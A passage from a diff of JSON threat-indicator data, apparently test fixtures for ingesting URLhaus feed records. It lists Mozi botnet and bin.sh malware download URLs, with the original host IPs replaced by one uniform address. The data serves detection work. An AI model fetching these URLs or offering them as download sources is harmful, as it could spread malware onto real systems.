 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693886994Z",
- "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://125.44.61.35:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
+ "ingested": "2021-12-13T08:40:08.027210800Z",
+ "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://89.160.20.156:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18220,18 +18220,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.92.217.195:60102/Mozi.m",
+ "original": "http://89.160.20.156:60102/Mozi.m",
 "scheme": "http",
 "port": 60102,
- "domain": "59.92.217.195",
- "full": "http://59.92.217.195:60102/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:60102/Mozi.m"
 },
- "ip": "59.92.217.195"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693890500Z",
- "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://59.92.217.195:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.92.217.195\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027217800Z",
+ "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://89.160.20.156:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18269,18 +18269,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.92.183.181:52225/Mozi.m",
+ "original": "http://89.160.20.156:52225/Mozi.m",
 "scheme": "http",
 "port": 52225,
- "domain": "59.92.183.181",
- "full": "http://59.92.183.181:52225/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52225/Mozi.m"
 },
- "ip": "59.92.183.181"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693893716Z",
- "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://59.92.183.181:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.92.183.181\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027224800Z",
+ "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://89.160.20.156:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18318,18 +18318,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.99.95.7:56733/Mozi.m",
+ "original": "http://89.160.20.156:56733/Mozi.m",
 "scheme": "http",
 "port": 56733,
- "domain": "59.99.95.7",
- "full": "http://59.99.95.7:56733/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:56733/Mozi.m"
 },
- "ip": "59.99.95.7"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693896943Z",
- "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://59.99.95.7:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.95.7\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027231700Z",
+ "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://89.160.20.156:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18367,18 +18367,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://58.249.82.105:57042/Mozi.m",
+ "original": "http://89.160.20.156:57042/Mozi.m",
 "scheme": "http",
 "port": 57042,
- "domain": "58.249.82.105",
- "full": "http://58.249.82.105:57042/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57042/Mozi.m"
 },
- "ip": "58.249.82.105"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693900159Z",
- "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://58.249.82.105:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.82.105\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027238600Z",
+ "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://89.160.20.156:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18416,18 +18416,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.99.188.73:38035/Mozi.m",
+ "original": "http://89.160.20.156:38035/Mozi.m",
 "scheme": "http",
 "port": 38035,
- "domain": "59.99.188.73",
- "full": "http://59.99.188.73:38035/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38035/Mozi.m"
 },
- "ip": "59.99.188.73"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693903415Z",
- "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://59.99.188.73:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.188.73\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027245500Z",
+ "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://89.160.20.156:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18465,18 +18465,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.228.238.118:33540/Mozi.m",
+ "original": "http://89.160.20.156:33540/Mozi.m",
 "scheme": "http",
 "port": 33540,
- "domain": "42.228.238.118",
- "full": "http://42.228.238.118:33540/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:33540/Mozi.m"
 },
- "ip": "42.228.238.118"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693907302Z",
- "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://42.228.238.118:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.238.118\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027252500Z",
+ "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://89.160.20.156:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18514,18 +18514,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.238.236.187:51947/Mozi.m",
+ "original": "http://89.160.20.156:51947/Mozi.m",
 "scheme": "http",
 "port": 51947,
- "domain": "42.238.236.187",
- "full": "http://42.238.236.187:51947/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51947/Mozi.m"
 },
- "ip": "42.238.236.187"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693910748Z",
- "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://42.238.236.187:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.238.236.187\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027259400Z",
+ "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://89.160.20.156:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18563,18 +18563,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.123.28:36915/Mozi.m",
+ "original": "http://89.160.20.156:36915/Mozi.m",
 "scheme": "http",
 "port": 36915,
- "domain": "186.33.123.28",
- "full": "http://186.33.123.28:36915/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36915/Mozi.m"
 },
- "ip": "186.33.123.28"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693913764Z",
- "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://186.33.123.28:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.28\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027266400Z",
+ "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://89.160.20.156:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18612,18 +18612,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.116.84.95:38865/Mozi.m",
+ "original": "http://89.160.20.156:38865/Mozi.m",
 "scheme": "http",
 "port": 38865,
- "domain": "182.116.84.95",
- "full": "http://182.116.84.95:38865/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:38865/Mozi.m"
 },
- "ip": "182.116.84.95"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693916900Z",
- "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://182.116.84.95:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.84.95\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027273200Z",
+ "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://89.160.20.156:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18660,18 +18660,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://103.217.123.186:55480/Mozi.m",
+ "original": "http://89.160.20.156:55480/Mozi.m",
 "scheme": "http",
 "port": 55480,
- "domain": "103.217.123.186",
- "full": "http://103.217.123.186:55480/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:55480/Mozi.m"
 },
- "ip": "103.217.123.186"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693920457Z",
- "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://103.217.123.186:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.217.123.186\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027280100Z",
+ "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://89.160.20.156:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18708,18 +18708,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.136.98.81:51996/Mozi.m",
+ "original": "http://89.160.20.156:51996/Mozi.m",
 "scheme": "http",
 "port": 51996,
- "domain": "182.136.98.81",
- "full": "http://182.136.98.81:51996/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:51996/Mozi.m"
 },
- "ip": "182.136.98.81"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693923823Z",
- "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://182.136.98.81:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.136.98.81\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027287100Z",
+ "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://89.160.20.156:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18756,18 +18756,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://125.47.250.69:36042/Mozi.m",
+ "original": "http://89.160.20.156:36042/Mozi.m",
 "scheme": "http",
 "port": 36042,
- "domain": "125.47.250.69",
- "full": "http://125.47.250.69:36042/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:36042/Mozi.m"
 },
- "ip": "125.47.250.69"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693927530Z",
- "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://125.47.250.69:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.47.250.69\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027294Z",
+ "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://89.160.20.156:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18804,18 +18804,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.137.96.31:34350/Mozi.m",
+ "original": "http://89.160.20.156:34350/Mozi.m",
 "scheme": "http",
 "port": 34350,
- "domain": "222.137.96.31",
- "full": "http://222.137.96.31:34350/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:34350/Mozi.m"
 },
- "ip": "222.137.96.31"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693930756Z",
- "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://222.137.96.31:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"222.137.96.31\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027300900Z",
+ "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://89.160.20.156:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18852,18 +18852,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://223.130.29.204:53587/Mozi.m",
+ "original": "http://89.160.20.156:53587/Mozi.m",
 "scheme": "http",
 "port": 53587,
- "domain": "223.130.29.204",
- "full": "http://223.130.29.204:53587/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53587/Mozi.m"
 },
- "ip": "223.130.29.204"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693933902Z",
- "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://223.130.29.204:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"223.130.29.204\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027307900Z",
+ "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://89.160.20.156:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18900,18 +18900,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.52.28.142:53444/Mozi.m",
+ "original": "http://89.160.20.156:53444/Mozi.m",
 "scheme": "http",
 "port": 53444,
- "domain": "61.52.28.142",
- "full": "http://61.52.28.142:53444/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53444/Mozi.m"
 },
- "ip": "61.52.28.142"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693937208Z",
- "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://61.52.28.142:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.28.142\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027314900Z",
+ "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://89.160.20.156:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18949,18 +18949,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://120.85.254.107:58653/Mozi.m",
+ "original": "http://89.160.20.156:58653/Mozi.m",
 "scheme": "http",
 "port": 58653,
- "domain": "120.85.254.107",
- "full": "http://120.85.254.107:58653/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:58653/Mozi.m"
 },
- "ip": "120.85.254.107"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693940254Z",
- "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://120.85.254.107:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.254.107\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027321800Z",
+ "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://89.160.20.156:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -18997,18 +18997,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://202.164.139.218:50579/Mozi.m",
+ "original": "http://89.160.20.156:50579/Mozi.m",
 "scheme": "http",
 "port": 50579,
- "domain": "202.164.139.218",
- "full": "http://202.164.139.218:50579/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50579/Mozi.m"
 },
- "ip": "202.164.139.218"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693944111Z",
- "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://202.164.139.218:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"202.164.139.218\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.027328700Z",
+ "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://89.160.20.156:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -19045,18 +19045,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://114.199.216.11:3553/Mozi.m",
+ "original": "http://89.160.20.156:3553/Mozi.m",
 "scheme": "http",
 "port": 3553,
- "domain": "114.199.216.11",
- "full": "http://114.199.216.11:3553/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:3553/Mozi.m"
 },
- "ip": "114.199.216.11"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693947538Z",
